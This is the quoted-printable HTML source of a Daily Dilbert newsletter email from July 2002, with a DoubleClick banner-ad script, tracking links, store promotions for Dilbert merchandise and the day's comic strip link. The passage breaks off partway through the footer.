 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D08-IFHQIRj_UrnSnmog3u-VQtLAidRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3D1d-6K_jIGQ_77qurKDRlo87C_vUCsRR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D32-GxGIIrQRjNL9t9bDFQVsUYkQN9RR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D47-ADxxIIZ=
 m12K3FNjOiYGwl3BfJ9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/20/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D5c-BnN=
 PIZnUbrLYvm_53AlMDVhbMRRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3D71-GwnUIEZQfBywI9pqwFBR5r2YBdRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3D86-8fo1QCJxnygDBsLSjVe9_shuZRRR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D9c=
 -xtCpQanwk_lV_2YlXRIatIRbBsRR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3Db1-YzzzJQ-00z-iYWJUr9n_ylHMYP9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3Dc6-URl9QMLzgZRSh7mWdh_IeLuxu9RR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3Ddb-rm79QJEz6L2hwBgvp1t9spLcVdRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3Df0-nvTDQWgtK4IE7Fr2fIf5OwrimdRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 05-gDWLIG8ZRwfJNNRfn5DFHO-sYsRR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D1a-y6PkIlXm6M-aYpNd5=
 I04xuE5R9RR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D2f-hYtFIqnKA6qF=
 j_IP20D4jzt0Q9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert2002071741420.gif&amp;EmailDate=3DJuly=
 -20-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/im=
 ages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send This=
  Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:/=
 /ummail4.unitedmedia.com:80/Click?q=3D44-9nmfIZU4Yw3fhz7EM8KacHOoJRRR"&gt;&lt;IMG=
  SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gi=
 f" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;nb=
 sp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D59-y52o=
 IEn4hwdkwB8lpQ-zlD08ddRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert2002071741420.gif" BORDER=3D"0" ALT=3D"You need to go=
  online to see today's strip and other cool features on the Daily Dilbert."=
 &gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.=
 gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D6f-3xY9=
 IOL2bHgXWcW3RUvKTN9nPsRR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3D84-CCDyQ60lyzpzAvwZsnhhpYUoZsRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
